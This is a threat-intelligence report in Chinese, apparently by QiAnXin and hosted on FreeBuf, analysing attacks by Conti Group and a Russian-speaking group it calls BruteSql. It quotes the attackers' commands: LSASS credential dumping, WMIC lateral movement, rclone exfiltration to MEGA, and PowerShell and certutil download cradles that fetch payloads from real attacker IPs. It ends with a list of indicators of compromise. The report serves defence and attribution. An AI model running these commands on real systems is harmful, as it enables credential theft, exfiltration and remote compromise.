freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Operation(верность) mercenary:陷阵于东欧平原的钢铁洪流
2022-08-10 16:08:42

概述

奇安信威胁情报中心一直在对俄语威胁者以及活跃的地下论坛保持高强度的跟踪,最近我们观察到闻名全球的Conti Group在这半年内使用Exchange漏洞对风险投资公司、奢侈品企业、芯片制造业、外企合资制造业发起定向性攻击活动,这些被攻击的企业都有一个共同的特点:“富有”。

Conti Group是现阶段最活跃的勒索团伙之一,根据境外友商cyberint去年的发布的报告[1],Conti Group在2021年成功开展了600次攻击活动,共盈利27亿美元。由于在2022年2月份Conti Group的高管宣称在俄乌战争中站队俄罗斯一侧,导致其内部数据被人在Twitter上公开。1660118513_62f365f1beae66cc7744a.png!small?1660118514405

cyberint对泄露的信息进行分析后发现,Conti Group内部人员高达400余人,分工之细堪比一家小型科技公司。1660118522_62f365facc6026edbcee3.png!small?1660118523529

美国《连线》杂志称[2]泄露的聊天记录表明Conti Group与APT29存在临时性的合作。1660118528_62f36600e3101c738cb09.png!small?1660118530079

除了Conti Group,我们也观察到其他俄语威胁者通过爆破主流数据库或者利用Nday漏洞的形式植入CobatStrike或者anydesk远程控制软件,等到时机成熟后下发GlobeImposter或者Leakthemall勒索软件,我们将其命名为BruteSql Group。我们在上半年曾经发表过《死灰复燃!新型REvil勒索软件在野攻击活动分析》[3]介绍了REvil勒索软件最新的攻击活动,但是在之后的数月里并没有看到类似的攻击活动,暗网页面也没有更新,攻击团伙转入了不活跃的状态。

与之前的文章类似,本文内容也仅仅是对Conti Group在过去半年时间内攻击手法做一个分享。文末会分享该团伙历史使用的IOC,供友商追踪溯源。


Conti Group

Conti Group通过Exchange漏洞与目标机器建立隧道连接,之后向\windows\system32目录下投递名为lsass.dll的密码窃取后门。执行的命令行如下:

命令行

cmd.exe /c !uplaod D:\Uchebka\work\SOFT\LSASS\lsass.dll -dest C:\Windows\system32\lsass.dll

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\logincontroll\NetworkProvider" /v "ProviderPath" /t "REG_EXPAND_SZ" /d "C:\Windows\system32\lsass.dll"

cmd.exe /c dir c:\windows\temp\tmpQWER.tmp

rundll32 C:\Windows\Sysnative\comsvcs.dll, MiniDump 668 c:\windows\temp\tmpQWER.dmp full

从命令行中可以看到Conti Group攻击者的工作路径,Uchebka经过查询是东欧地区人的姓氏。

Md5

文件名

0838b1a1618c5ea3137ece85f83686c0

lsass.dll

样本主要功能将系统凭证存储到c:\windows\temp\tmpQWER.tmp文件中。1660118542_62f3660eaa9a630fcbfb2.png!small?1660118543755

攻击者成功抓取域管的账号密码后在C:\ProgramData下释放Psexec.exe,并执行了两个BAT脚本。1660118548_62f36614dc8ca73d60d4e.png!small?1660118549494

输出后的文件如下:1660118555_62f3661bb0db9c5680f53.png!small?1660118556312

另一个BAT脚本则是查看内网C段中所有机器的Program Files目录1660118562_62f36622eb909d525feeb.png!small?1660118563731

攻击者在内网漫游过程中还会使用wmic和winrs等系统命令进行横向移动,投递Anydesk远程控制程序。

命令行

cmd.exe /c winrs -rlocalhost -u:XXXXX -p:XXXXX cmd.exe /c ver

cmd.exe /c WMIC /node:"XXXX" /user:"XXXXXX" /password:"XXXXXX" process call create "c:\programdata\AnyDesk.exe --get-id "

除了Anydesk,攻击者还会植入木马后门,这些样本在代码逻辑层面没有任何同源性,其功能只是内存解密CS载荷并加载。1660118573_62f3662db9068aad2d918.png!small?1660118574448

Md5

文件名

c914661e98b35630a9abc356f4b24c58

rew.dll

dbb8f2e4225ed6fb09e78493052d50a8

Sys.dll

02953d5f6363896427d09fa112f5da16

Wud.dll

大部分的木马都是无文件,例如我们在一台LDAP服务器上发现了五个注入到系统进程中的CS载荷。

当Conti在内网中找到高价值的服务器后会下发rclone工具拷贝敏感数据。

命令行

rclone copy --max-age 3y "\\XXXXXXX\D$" remote:"XXXXXX\files\D" --exclude "*.{iso,pptx,msi,vmdk,pptx.MP4,psd,7z,rar,zip,MOV,FIT,FIL,mp4,mov,mdb,iso,exe,dll,mkv,ova,one}" -q --ignore-existing --auto-confirm --multi-thread-streams 30 --transfers 30 --bwlimit 5M -P

文件目录如下:1660118591_62f3663f1a30a481e8c1b.png!small?1660118591631

Rclone配置文件如下:1660118595_62f366432d205c0d7b2ba.png!small?1660118595704

攻击者使用匿名邮箱othdripinid1979@protonmail.com注册了MEGA网盘并花了19.99欧元通过比特币支付的方式购买了会员服务。1660118600_62f366481743db9575aea.png!small?1660118600533

根据历史登录信息我们发现攻击者在2022年2月25日时使用波兰的IP(37.252.11.18)通过firefox浏览器登录mega网页端,两分钟后购买了会员服务。1660118604_62f3664caff51a32574e3.png!small?1660118605393

在其他的攻击活动中Conti Group通过Exchange漏洞启动powershell直接下载CobaltStrike并执行。

命令行

powershell /c powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat -outfile 7.bat

powershell /c powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat -outfile 8.bat

下载的BAT内容如下,执行CS后门。

命令行

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://91.213.50.102:80/avadacedavra'))"

接着安装screenconnect服务,实现远程控制。

ITW

https://cdn-101.anonfiles.com/xd65J5gdya/088d20aa-1652635603/2.msi

1660118618_62f3665adbcdf4b60bc5a.png!small?1660118619512

以上操作均被天擎拦截,几天后不甘心的攻击者通过certutil.exe的方式投递payload。

命令行

Cmd /c certutil.exe –urlcache –split –f http://80.209.241.3:8888/1.msi

遗憾的是该命令也被天擎拦截,msi文件会在programdata目录下释放anydesk实现远程控制。1660118645_62f3667509179ce00b110.png!small?1660118646145

由于我们及时对相关IOC进行封堵并提前告知客户,所以在我们的视野中没有看到勒索软件的下发。我们掌握的IOC与美国CISA发布的报告[4]存在一定程度的重合,另外根据境外友商在过去两年中发布的Conti相关报告中的TTP进行对比我们综合判断以上攻击事件均隶属于Conti Group。

基于CobaltStrike的C2,我们注意到Google TAG团队在2022年5月19日曾发布过一篇名为《Bumblebee Malware from TransferXL URLs》的报告中[5]提到Bumblebee的https流量会先访问amazonAWS 服务器接着访问CobaltStrike的域名xenilik.com。1660118660_62f366847de9546a90385.png!small?1660118661099

该域名与我们在LDAP服务器上发现的无文件的CS回连的C2一致,我们看到的时间为2022年5月16日。所以我们认为Bumblebee Malware的活动也归属于Conti Group。


BruteSql Group

我们在日常威胁狩猎过程中发现了另一伙俄语威胁者通过对sql server爆破和Nday漏洞的方式执行cmd命令加载CobaltStrike后门,成功植入木马后释放anydesk实现远程控制,命令行如下:

命令行

cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring("""http://92.255.85.138:80/a"""))"

cmd.exe /c "echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile("http://144.48.240.69/dar.exe","%TEMP%\UN8NWHI0.exe") >> %TEMP%\test.ps1 & powershell -ExecutionPolicy Bypass %temp%\test.ps1 & WMIC process call create "%TEMP%\UN8NWHI0.exe""

木马信息如下。

Md5

文件名

72c84779b[]5862c1462ca0c3da30bde39

un8nwhi0.exe

7d74663288cd910c7dfd00e4e3136a23

fkgwcwg.exe

木马执行过程中会将CobaltStrike注入到系统进程regasm.exe中。C2: 92.255.85.138: 8991。攻击者会通过regasm.exe下发anydesk远程控制,接着会下发一些工具,窃取相关软件的密码。

Md5

文件名

09078828931a04c2a3f95db7641ce805

webbrowserpassview.exe

264f7b719ce8bc281377582a24eaac69

wirelesskeyview64.exe

28dc8674d8d692ed156998520a5e6303

mimikatz.exe

35861f4ea9a8ecb6c357bdb91b7df804

pspv.exe

36e91497fee355a45a5cb23a5ea91139

chromepass.exe

44bd492dfb54107ebfe063fcbfbddff5

rdpv.exe

4b27c3d57fe01a2a5b2001854507e0e2

iepv.exe

6121393a37c3178e7c82d1906ea16fd4

pstpassword.exe

76b916f3eeb80d44915d8c01200d0a94

routerpassview.exe

782dd6152ab52361eba2bafd67771fa0

mailpv.exe

7f31636f9b74ab93a268f5a473066053

bulletspassview64.exe

d28f0cfae377553fcb85918c29f4889b

vncpassview.exe

我们观察到该团伙在2021年主要投递的是global imposter勒索软件,但是到了2022年该团伙开始投递Leakthemall勒索软件。

Md5

文件名

480d33334909d49d61cb75c536aef1f7

360.exe

Fee16109b05f88040bc7f41e71dd50b5

360.exe

在七月份时我们观察到该团伙开始投递基于Conti源码修改而来的Bluesky勒索软件[6],境外友商将其与Conti Group相关联,由于我们没有获取到更多信息,故暂不做任何结论性的推测。

命令行

iex ((New-Object System.Net.WebClient).DownloadString("https://kmsauto.us/someone/start.ps1"))

IOC

Conti Group

MD5:

0838b1a1618c5ea3137ece85f83686c0

c914661e98b35630a9abc356f4b24c58

dbb8f2e4225ed6fb09e78493052d50a8

02953d5f6363896427d09fa112f5da16

C2:

rewujisaf.com

fuvataren.com

xenilik.com

kusayeyixa.com

wudimomo.com

URL:

https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat

https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat

http://91.213.50.102:80/avadacedavra

http://80.209.241.3:8888/1.msi

https://cdn-101.anonfiles.com/xd65J5gdya/088d20aa-1652635603/2.msi


BruteSql Group

MD5:

72c84779b[]5862c1462ca0c3da30bde39

7d74663288cd910c7dfd00e4e3136a23

09078828931a04c2a3f95db7641ce805

264f7b719ce8bc281377582a24eaac69

28dc8674d8d692ed156998520a5e6303

35861f4ea9a8ecb6c357bdb91b7df804

36e91497fee355a45a5cb23a5ea91139

44bd492dfb54107ebfe063fcbfbddff5

4b27c3d57fe01a2a5b2001854507e0e2

6121393a37c3178e7c82d1906ea16fd4

76b916f3eeb80d44915d8c01200d0a94

782dd6152ab52361eba2bafd67771fa0

7f31636f9b74ab93a268f5a473066053

d28f0cfae377553fcb85918c29f4889b

480d33334909d49d61cb75c536aef1f7

Fee16109b05f88040bc7f41e71dd50b5

C2:

92.255.85.138: 8991

URL:

http://144.48.240.69/dar.exe

http://92.255.85.138:80/a

https://kmsauto.us/someone/start.ps1


参考链接

[1] https://cyberint.com/blog/research/contileaks/

[2] https://www.wired.com/story/conti-ransomware-russia/

[3] https://mp.weixin.qq.com/s/A9c4Le-DL8fBEw8hfe1EcQ

[4] https://www.cisa.gov/uscert/ncas/alerts/aa21-265a

[5] https://isc.sans.edu/diary/rss/28664

[6] https://cloudsek.com/threatintelligence/tracking-the-operators-of-the-newly-emerged-bluesky-ransomware/



本文作者:, 转载请注明来自FreeBuf.COM

# 东欧 # Conti
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦